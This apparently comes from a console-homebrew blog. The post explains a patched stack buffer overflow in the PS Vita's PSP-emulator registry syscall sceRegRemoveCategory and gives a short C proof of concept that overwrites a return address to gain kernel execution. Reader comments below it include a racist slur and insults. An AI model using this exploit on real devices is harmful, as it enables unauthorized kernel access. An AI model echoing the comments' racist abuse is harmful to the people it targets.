Anatomy of a cool (undisclosed) kernel exploit

How many times have you heard “Kernel exploits are hard to find, devs can’t just release them!”?
Well, that’s not really true, to prove that, here I’m posting a pretty cool bug found a couple of years ago.

Of course, this exploit is patched by now, it wouldn’t make sense to waste a perfectly working exploit right now (even thought there are many…), but I thought it’d be cool to show you guys this :)

But first, a bit of history.
In 2011, while investigating registry.prx, I noticed Sony made a pretty dumb error (yes, another one…), and started working with some1 to exploit this.
It only took a few days really to get a POC running, it’s probably one of the easiest exploits ever, a simple, dumb, buffer overflow.
A year ago, I handed it over to jigsaw who used it to investigate Syscall Internals (he did a pretty cool job btw ;))

But now, the exploit.
Basically, we exploited a vulnerability in sceRegRemoveCategory. Basically, this syscall removes a category from the system registry (obviously). It takes two arguments, a REGHANDLE and a string.
The REGHANDLE is a value given to us by sceRegOpenRegistry when we open a valid registry, totally legit, but let’s take a look at that string…

The string is just the name of the category you want to get rid of. In PSP’s system registry, all names start with a ‘/’, and sceRegRemoveCategory checks only that. The first character of the string.

Really, it checks also if the provided string is in kernel space, but we don’t care about that in this case.
RemoveCategory allocates 0x1B (27) bytes on its stack, and then calls a subroutine that basically copies our string onto that space…but it doesn’t check the length of our string!

See the problem here? We can easily overflow that buffer by providing a string that looks like this ‘/<27+ random chars>’.
The return address is stored 0×54 (90) bytes later on the stack, so we can just overwrite it and wait for sceRegRemoveCategory to return, even with an error, we don’t care ;)

tl;dr, here’s a code snippet, callback_addr is the address of the function you want to execute with kernel permissions.

 char rmc_stack[0x5A];
 struct RegParam exp_params;
 REGHANDLE exp_handle;

 memset(&exp_params, 0, sizeof(exp_params));

 exp_params.regtype = 1;
 exp_params.unk2 = 1;
 exp_params.unk3 = 1;
 exp_params.namelen = strlen("/system");

 strcpy(exp_params.name, "/system");

 if(!sceRegOpenRegistry(&exp_params, 2, &exp_handle)) //Need a valid registry handle to continue
 {
   memset(rmc_stack, 'X', 0x5A); //Fill the string with crap
   rmc_stack[0] = '/'; //This is enough to fool registry...
   rmc_stack[0x5A - 1] = 0;
   rmc_stack[0x5A - 2] = (callback_addr >> 24) & 0xFF;
   rmc_stack[0x5A - 3] = (callback_addr >> 16) & 0xFF;
   rmc_stack[0x5A - 4] = (callback_addr >> 8) & 0xFF;
   rmc_stack[0x5A - 5] = callback_addr & 0xFF;
   sceRegRemoveCategory(exp_handle, rmc_stack); //;)
 }

As I said, this is patched by now (I think it was patched in latest PSV update, not sure), but doesn’t mean you can’t implement it, maybe in some older firmware, for exercise.

I’m honestly surprised it took this long for Sony to patch this, especially when they made the same error in loadexec, back in 2.50 (iirc).

This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting

- Freddy

  1. nigga’s avatar

    not interested

    Reply

  2. BattyCrease’s avatar

    Interesting read, Freddy. Not checking string lengths really should be a fireable offense. ^^

    Reply

    1. Different55’s avatar

      Don’t say that. The glorious people who allow exploits like this should be praised for making it easy for the devs.

      Reply

  3. EIREXE’s avatar

    The point on kernel exploits is that they are limited

    Reply

  4. yosh’s avatar

    “This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting…”

    Agreed lol, though that’s why it’s so funny xD

    Reply

  5. yosh’s avatar

    Indeed I just checked and saw it, though it was removed in fw 1.80, only available until 1.67.
    In 1.80 though it doesn’t seem Sony patched it, rather they dummied sceRegRemoveCategory with dummy return values lol so maybe they didn’t even notice this.

    Reply

    1. yosh’s avatar

      1.69X also still have it though naturally

      Reply

  6. wartaf’s avatar

    nice, but i dunno what it is really do :p

    Reply

  7. Davee’s avatar

    Oh freddy, you don’t give yourself enough credit!

    Reply

    1. yosh’s avatar

      True, nice work freddy

      Reply

    2. SuzieJoeBob’s avatar

      It is still pretty interesting though. Sony didn’t remove the system call, but rather just gave it pre-determined (dummy) return values. If one was able to overwrite this system call with the old one, would the portions of old exploits relating to this system call work yet again???

      Reply

      1. SSJ-Vita’s avatar

        I like the way you think, if it could be done MHFU FTW

        Reply

  8. Adx2’s avatar

    maybe sony might have done the same mistake in psvita security… my saying is that the key is in the firmware stored in the vita like the psp was hiding but someone discoverd the key and very soon psp was hacked and so if the psvita has the same security and a genius guy finda it the vita might be very hacked soon… ALL IT TAKES A LITTLE PUSH

    Reply

    1. hgoel0974’s avatar

      same security? Sorry, but no, they do not have the same security.

      Reply

      1. gunblade’s avatar

        still wandering on the vita live screen sony made update in 2.12 think with all the patches sony did since the vitas realse psp xmb with xbox boot sounds cool..i guess would need to get more into the vita side to play with the psp boot screen but did try with ark yet… ark still prety cool..

        Reply

  9. Adx2’s avatar

    var is pavit hacked = prompt (“IS PSVITA HACKED”)
    if
    (“psvita is hacked”){
    console.log (“very good”)
    }else{
    console.log (“very bad”)
    {

    Reply

    1. svenn’s avatar

      I have no idea what language you use, but there is def at least 1 syntax error in.

      Reply

  10. Vita001’s avatar

    Time to bring out the vita exploits…

    Reply

  11. Adx2’s avatar

    security may nat be the whole same cuz sony is said to be learning from its mistakes … But minor security may be same … we do not know right now waht is same and what,s not lets see it in future when the psvita will be completely hacked then we will se whats same and what not……

    Reply

    1. xoombie503’s avatar

      all we know is that you need to go back to school, or that you are black.

      Reply

      1. DeathOfChaos’s avatar

        I’ve been contemplating whether to update my TN-V Vita or not and this article really got me thinking about updating, lol. Been tired of not updating my trophies, lol.

        Reply

      2. DeathOfChaos’s avatar

        Pretty racist, but ok…

        Reply

      3. NeonAera’s avatar

        @xoombie503

        Adx2 is just talking Sony’s encryption securities and about the possibilities of hacking the Vita and etc.. So what do you mean go back to school and that racist remark? So what if his spelling and grammar isn’t all that great, this place is not a writing center where everyone’s punctuation has to be right-on all the time. And sometimes people like to use shorter words.. doesn’t mean they need to go back to school.

        So xoombie503 stop being a trolling racist jerk and gtfo man…

        @Adx2

        Don’t take zoombie seriously.. He could just be trolling to try and spark a fire, or just a seriously messed up person in real life that sadly enjoys to curse, hate, bully, and take it out on people hiding behind their computer screen because it’s easier.

        Take care man.

        Anyway nice article, freddy_156.

        Reply

        1. you can read’s avatar

          the things that are coming out of his hands?

          Reply

  12. Hackinformer’s avatar

    This is great article but I’m bored with psp emulation. This is history repeating itself. User-mode is great but it is every hard to get a lot of stuff working on it and I’m stuck at 2.10 FW. An like you said Freddy “maybe it’s time to put our resources into something more interesting…” and with all the new Open-source OS’s and ARM development boards. I think you may be right..

    Reply

  13. Miguel’s avatar

    There is far more development happening with the 3ds side of things versus the vita we need more people to invest time into breaking the security of the vita and actually be able to use the full specs of the vita and not just enough to see it emulate psp stuff :(

    Reply

    1. Kyu’s avatar

      If you mean the bootloader,yes.
      Though the bootloader is only that,no homebrews/emulators/freedom.

      Reply

  14. adriandevera’s avatar

    Wonderful, I have a 1.67 right now! Sadly I still cant seem to get Open CMA 4.5 to muster on the current vita I have.. Uno still waiting on the ps3 as well… sigh

    Reply

    1. gunblade’s avatar

      looks like u can tweek with ur ps3 i guess was thinking but u need a ps3 with cfw. 1.67 sweet though think the vita iamoncame with 1.80 wich is shity as to the first one i had came brand new n homebrew n outher os ready but i had to update it n not watch youtube first but anyway downgrading the psp was said to go to like 1.51 and 1.50 for japan or sumthing..

      Reply

  15. DarkenLX’s avatar

    isnt the buffer overflow the same as the stack overflow in windows pc and whatnot?

    Reply

    1. wololo’s avatar

      No. A stack overflow is a specific case of buffer overflow, and none of this is specific to windows vs pc vs psp.

      Reply

  16. Chuckthetekkie’s avatar

    Nintendo made a similar mistake with Twilight Princess for the Wii where you could edit the save file and make the horse’s name longer than what was allowed and it caused a buffer overflow. Since retail Wii games can’t be updated Nintendo had to patch the bug in the Wii system software by having the system software explicitly check the save file and if the horse’s name was too long it would delete the save file. Although it took Nintendo a few tries to get it right.

    It seems really silly to have a string value and not check to make sure the value is of the right length and if not, do some kind of error. Then again Sony probably outsourced their programmers and don’t pay them enough to check for serious bugs like this.

    Reply

  17. somthing something something light side’s avatar

    I would really like a actual PSV hack, not for backup games but image the emulating possiblitys i could play Banjo Tooie on it with no lag at all

    Reply

  18. SSJ-Vita’s avatar

    Go Go Gadget 2035 psv Ecfw!

    Reply

  19. svenn’s avatar

    Well, saying this string is unchecked and knowing how to use it are two different things; Though this is in no way a proof of the amount of kexploits still in PSP kernel;

    Reply

  20. gunblade’s avatar

    i still have 2.12 downloaded n ready to install on the vita on 2.06 last i cheack. shity thing would be were u need a vita at like 150 to downgrade a 206 vita last i cheack sony was running the new 2.. on the vita at 1.80 and 2.02

    Reply

  21. gunblade’s avatar

    i was facebook app need an update…..

    Reply

  22. nevercall’s avatar

    I hate myself for whenever i see codes, I WANT TO BANG MY HEAD ON THE KEYBOARD and say to myself… WHY DID’nT I KNOW THIS!! Why cant i UNDERSTAND THIS THING!!

    int main(){

    cout << "as of now, this is the only thing i can do and all other arithmetic calculations and some knowledge on variables" << endl;

    return 0;

    }

    I WANT TO LEARN TO CODE.

    Reply

    1. capcomlegend’s avatar

      dont feel bad all I know is su fix_permission in terminal on my android ,makes me look cool when i eat at a dinner with a cute waitress around lol

      Reply

    2. adriandevera’s avatar

      tbh… C and C++ are really horrible and not noob friendly.. I tried coding that in middle school for nds homebrew and it didnt come out too well.

      So I tried with Objective C and learned it relatively much quicker. I think the syntax for Objective C maks more sense and is far more intuitive than that of the older C itself..

      Reply

  23. Adx2’s avatar

    @NeonAera thnks for supporting me …

    and

    @xoombie503 are u a grammer teacher u dumbshit ..nAH JST JOIKIG :)

    Reply

  24. Adx2’s avatar

    @nevercall
    i think u should visit code.org and u can learn to code..
    i m learning javascript programming on code.org u can learn anything related to coding there its really helpfull

    Reply

    1. nevercall’s avatar

      i’m on it.. and yeah, its quite useful… but hey, do i really need to learn all of those just to tell my computer like:

      “hey computer, i’m downloading a file right now, if its a video file, move it to the videos folder i specified, if its a music file, move it to the music folder i specified, if the title contains “sex, porn, lesbian, xxx, brazzers, hentai, loli, teens, virgin, asian and other stuffs like that” move it to the “system hidden” folder i specified, ELSE, retain it to my downloads folder.”

      what i mean is, I just want to learn what can be useful for my everyday life.

      Reply

Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>